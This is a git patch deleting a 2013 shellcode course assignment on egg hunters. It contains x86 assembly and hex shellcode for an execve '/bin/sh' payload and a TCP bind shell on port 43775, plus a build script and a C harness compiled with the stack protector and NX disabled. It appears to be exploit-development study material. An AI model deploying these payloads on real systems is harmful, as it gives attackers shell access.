From eaeab3e5f708c1f0ef0eb53f08e5c7cc86b0a02d Mon Sep 17 00:00:00 2001 From: arno01 Date: Thu, 28 Mar 2013 13:19:37 +0100 Subject: [PATCH] Assignment 3 - major updates over Egg Hunter --- exam3/NOTES | 11 -- exam3/USAGE | 32 ------ exam3/egghunter.nasm | 79 ------------- exam3/hunter.nasm | 40 ------- exam3/make.sh | 130 ---------------------- exam3/payload-execve-stack.nasm | 44 -------- exam3/payload-shell_bind_tcp_smaller.nasm | 113 ------------------- exam3/payload.nasm | 1 - exam3/shellcode.c | 18 --- 9 files changed, 468 deletions(-) delete mode 100644 exam3/NOTES delete mode 100644 exam3/USAGE delete mode 100644 exam3/egghunter.nasm delete mode 100644 exam3/hunter.nasm delete mode 100755 exam3/make.sh delete mode 100644 exam3/payload-execve-stack.nasm delete mode 100644 exam3/payload-shell_bind_tcp_smaller.nasm delete mode 120000 exam3/payload.nasm delete mode 100644 exam3/shellcode.c diff --git a/exam3/NOTES b/exam3/NOTES deleted file mode 100644 index 088dd00..0000000 --- a/exam3/NOTES +++ /dev/null @@ -1,11 +0,0 @@ -NOTES - - no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice - - execstack: disables Executable space protection (NX). - Or Data Execution Prevention (DEP) on Windows, - or Write XOR Execute (W^X) on BSD. - CPU’s NX bit ("Never eXecute"). - - To disalbe Address Space Layout Randomization (ASLR) when running binary - setarch `arch` -R ./program diff --git a/exam3/USAGE b/exam3/USAGE deleted file mode 100644 index e2492b0..0000000 --- a/exam3/USAGE +++ /dev/null @@ -1,32 +0,0 @@ -USAGE - -1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) - -I'm using a symlink as follows - -exam3$ ln -svf payload-execve-stack.nasm payload.nasm -`payload.nasm' -> `payload-execve-stack.nasm' - - -2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) - -exam3$ ./make.sh "egg.MaRk" - [I] Using custom EGG mark: egg.MaRk - [+] Compiling payload.nasm ... - [+] Compiling hunter.nasm ... - [+] Extracting PAYLOAD code from payload ... - [+] Adding EGG mark to PAYLOAD ... - [+] Checking PAYLOAD code for NULLs ... - [+] Extracting HUNTER code from hunter ... - [+] Checking HUNTER code for NULLs ... - [+] Compiling shellcode.c ... --rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode - [+] All done! - - -3. Run the shellcode - -exam3$ ./shellcode -Hunter Length: 21 -Payload Length: 36 -sh-4.1$ diff --git a/exam3/egghunter.nasm b/exam3/egghunter.nasm deleted file mode 100644 index 90b829a..0000000 --- a/exam3/egghunter.nasm +++ /dev/null @@ -1,79 +0,0 @@ -; This program is free software: you can redistribute it and/or modify -; it under the terms of the GNU General Public License as published by -; the Free Software Foundation, either version 3 of the License, or -; (at your option) any later version. -; -; This program is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with this program. If not, see . -; -; -; Filename: egghunter.nasm -; Author: Andrey Arapov -; 2013 March -; -; - -section .data - egg1 equ "Egg-" ; DWORD Egg marker part1 - egg2 equ "Mark" ; DWORD Egg marker part2 - - -section .text -global _start - - -_start: - jmp short EggPoint - -continue: - pop eax - - ; Searching for the Egg marker -next: - inc eax ; Searching backwards -isEgg: - cmp dword [eax-8], egg1 - jne next - cmp dword [eax-4], egg2 - jne next - call eax - - ; EXIT - xor eax, eax - mov al, 1 - xor ebx, ebx - int 0x80 - -EggPoint: - call continue - -Egg: - db "Egg-Mark" ; QWORD egg marker - - ; loop counter = 8 - xor ecx, ecx - mov cl, 8 -decloop: - dec eax - loop decloop - - mov ecx, eax - xor edx, edx - mov dl, 8 - xor eax, eax - mov al, 4 - xor ebx, ebx - mov bl, 1 - int 0x80 - - xor eax, eax - mov al, 1 - xor ebx, ebx - int 0x80 - - diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm deleted file mode 100644 index da46f05..0000000 --- a/exam3/hunter.nasm +++ /dev/null @@ -1,40 +0,0 @@ -; This program is free software: you can redistribute it and/or modify -; it under the terms of the GNU General Public License as published by -; the Free Software Foundation, either version 3 of the License, or -; (at your option) any later version. -; -; This program is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with this program. If not, see . -; -; -; Filename: hunter.nasm -; Author: Andrey Arapov -; 2013 March -; -; - -section .data - egg1 equ "Egg-" ; DWORD Egg marker part1 - egg2 equ "Mark" ; DWORD Egg marker part2 - - -section .text -global _start - - -_start: - ; Searching for the Egg marker -next: - inc eax ; Searching forward (can also try dec eax) -isEgg: - cmp dword [eax-8], egg1 ; Checking if we can see egg1 - jne next ; If not, continuing to search - cmp dword [eax-4], egg2 - jne next - - call eax ; Once found, we call our payload diff --git a/exam3/make.sh b/exam3/make.sh deleted file mode 100755 index 00c5f73..0000000 --- a/exam3/make.sh +++ /dev/null @@ -1,130 +0,0 @@ -#!/usr/bin/env sh -# -# USAGE -# ./make.sh [Egg-Mark] -# -# NOTE -# Egg-Mark must be a plaintext with 8 bytes in length -# If Egg-Mark was not specified, the default one will be used. -# -# To specify a custom payload, simply modify the code of payload.nasm file. -# Alternativly, you can modify PAYLOADCODE= variable down below the code. -# - -ARG1=$1 - -if [ -z "$ARG1" ]; then - echo " [I] Argument not specified. Using default EGG mark." - ARG1="Egg-Mark"; -elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then - echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." - exit 1; -else - echo " [I] Using custom EGG mark: "$ARG1 -fi - - -DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm -EGGMARK=$ARG1 -NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) - -# Uncomment to save EGGMARK in HEX -EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') - -# Cleanup -rm -f shellcode payload.o payload hunter.o hunter - -echo " [+] Compiling payload.nasm ..." -nasm -f elf32 -o payload.o payload.nasm -ld -m elf_i386 -o payload payload.o - -echo " [+] Compiling hunter.nasm ..." -nasm -f elf32 -o hunter.o hunter.nasm -ld -m elf_i386 -o hunter hunter.o - -echo " [+] Extracting PAYLOAD code from payload ..." -PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) - -echo " [+] Adding EGG mark to PAYLOAD ..." -FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') - -echo " [+] Checking PAYLOAD code for NULLs ..." -if [[ $FULL_PAYLOADCODE == *00* ]]; then - echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." - exit 1 -fi - - -echo " [+] Extracting HUNTER code from hunter ..." -HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') - -# For debugging only -#echo ${DEFAULTEGG[0]} -#echo ${DEFAULTEGG[1]} -#echo ${NEWEGG[0]} -#echo ${NEWEGG[1]} - -# Preparing Default egg to HEX form in order to replace it with a New egg -DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') -DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') - -# Uncomment to save new EGGMARK in HEX format -NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') -NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') - -# Uncomment to save new EGGMARK in Plaintext format -#NEWEGG1=$(echo -n ${NEWEGG[0]}) -#NEWEGG2=$(echo -n ${NEWEGG[1]}) - - -FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') - -echo " [+] Checking HUNTER code for NULLs ..." -if [[ $FULL_HUNTERCODE == *00* ]]; then - echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." - exit 1 -fi - - -# Uncomment to see what will is replaced (default egg with a new one) -#echo $DEFEGG1 -#echo $DEFEGG2 -#echo $NEWEGG1 -#echo $NEWEGG2 -#echo $HUNTERCODE -#echo $FULL_HUNTERCODE - -cat > shellcode.c << EOF -#include -#include - -unsigned char hunter[] = \ -$FULL_HUNTERCODE; - -unsigned char garbage1[] = \ -"Just some garbage here..."; - -unsigned char payload[] = \ -$FULL_PAYLOADCODE; - -unsigned char garbage2[] = \ -"And some garbage there..."; - -main() -{ - printf("Hunter Length: %d\n", strlen(hunter)); - printf("Payload Length: %d\n", strlen(payload)); - int (*ret)() = (int(*)())hunter; - ret(); -} -EOF - -echo " [+] Compiling shellcode.c ..." -gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode - -# Cleanup -rm -f payload.o payload hunter.o hunter - -ls -la ./shellcode - -echo " [+] All done!" diff --git a/exam3/payload-execve-stack.nasm b/exam3/payload-execve-stack.nasm deleted file mode 100644 index 1ab23b8..0000000 --- a/exam3/payload-execve-stack.nasm +++ /dev/null @@ -1,44 +0,0 @@ -; This program is free software: you can redistribute it and/or modify -; it under the terms of the GNU General Public License as published by -; the Free Software Foundation, either version 3 of the License, or -; (at your option) any later version. -; -; This program is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with this program. If not, see . - -; Filename: payload-execve-stack.nasm -; Author: Andrey Arapov -; 2013 March - -global _start - - -section .text - -_start: - ; EAX - xor eax, eax - mov al, 11 ; execve syscall - - ; EBX - xor edx, edx - push edx ; NULL termination of '//bin/sh' string - push 0x68732f6e ; '//bin/sh' in reverse - push 0x69622f2f ; beginning of '//bin/sh' string is here - mov ebx, esp ; put the address of '//bin/sh' into ebx via esp - - ; ECX - push edx ; NULL termination of a stack - push ebx ; load our '//bin/sh' on a stack - mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. - - ; EDX - push edx ; NULL terminator - mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. - int 0x80 - diff --git a/exam3/payload-shell_bind_tcp_smaller.nasm b/exam3/payload-shell_bind_tcp_smaller.nasm deleted file mode 100644 index 7eae9b0..0000000 --- a/exam3/payload-shell_bind_tcp_smaller.nasm +++ /dev/null @@ -1,113 +0,0 @@ -; This program is free software: you can redistribute it and/or modify -; it under the terms of the GNU General Public License as published by -; the Free Software Foundation, either version 3 of the License, or -; (at your option) any later version. -; -; This program is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with this program. If not, see . -; -; -; Filename: payload-shell_bind_tcp_smaller.nasm -; Author: Andrey Arapov -; 2013 March -; -; DESC: -; - Binds to a port 43775 -; - Execs Shell on incoming connection -; -; -; Shellcode size: 108 bytes -; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff" -; -; Port is the last two bytes of the shellcode. In hex \xaa\xff (0xaaff = 43775) -; -; - -global _start - -section .text - -_start: - xor eax, eax - mov al, 102 ; socketcall - xor ebx, ebx - inc ebx ; 1 = SYS_SOCKET socket() - push BYTE 6 ; IPPROTO_TCP || int protocol); - push BYTE 1 ; SOCK_STREAM || int type, - push BYTE 2 ; AF_INET || socket(int domain, - mov ecx, esp ; ECX - PTR to arguments for socket() - int 0x80 - mov esi, eax ; save socket fd in ESI for later - - - jmp short call_get_port -port_in_esp: - pop edi ; getting port address from ESP - - push BYTE 102 - pop eax ; socketcall - inc ebx ; 2 = SYS_BIND bind() - xor edx, edx - push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) }; - push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX. - push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family, - mov ecx, esp ; Save PTR to sockaddr struct in ECX - push BYTE 16 ; socklen_t addrlen); - push ecx ; const struct sockaddr *addr, - push esi ; bind(int sockfd, - mov ecx, esp ; ECX = PTR to arguments for bind() - int 0x80 - - - mov BYTE al, 102 ; socketcall - inc ebx - inc ebx ; 4 = SYS_LISTEN listen() - push BYTE 1 ; int backlog); - push esi ; listen(int sockfd, - mov ecx, esp ; ECX = PTR to arguments for listen() - int 0x80 - - - mov BYTE al, 102 ; socketcall - inc ebx ; 5 = SYS_ACCEPT = accept() - push edx ; socklen_t *addrlen = 0); - push edx ; struct sockaddr *addr = NULL, - push esi ; listen(int sockfd, - mov ecx, esp ; ECX = PTR to arguments for accept() - int 0x80 - - - ; dup2 to duplicate sockfd, that will attach the client to a shell - ; that we'll spawn below in execve syscall - xchg eax, ebx ; after EBX = sockfd, EAX = 5 - push BYTE 2 - pop ecx -dup2_loop: - mov BYTE al, 63 - int 0x80 - dec ecx - jns dup2_loop - - - ; spawning as shell - xor eax, eax - push eax - push 0x68732f6e ; '//bin/sh' in reverse - push 0x69622f2f ; beginning of '//bin/sh' string is here - mov ebx, esp - push eax - mov edx, esp ; ESP is now pointing to EDX - push ebx - mov ecx, esp - mov al, 11 ; execve - int 0x80 - -call_get_port: - call port_in_esp - db 0xaa, 0xff ; BYTE (43775 in straight hex) - diff --git a/exam3/payload.nasm b/exam3/payload.nasm deleted file mode 120000 index 5ba03e3..0000000 --- a/exam3/payload.nasm +++ /dev/null @@ -1 +0,0 @@ -payload-execve-stack.nasm \ No newline at end of file diff --git a/exam3/shellcode.c b/exam3/shellcode.c deleted file mode 100644 index feaf2d7..0000000 --- a/exam3/shellcode.c +++ /dev/null @@ -1,18 +0,0 @@ -#include -#include - -unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0"; - -unsigned char garbage1[] = "Just some garbage here..."; - -unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; - -unsigned char garbage2[] = "And some garbage there..."; - -main() -{ - printf("Hunter Length: %d\n", strlen(hunter)); - printf("Payload Length: %d\n", strlen(payload)); - int (*ret)() = (int(*)())hunter; - ret(); -}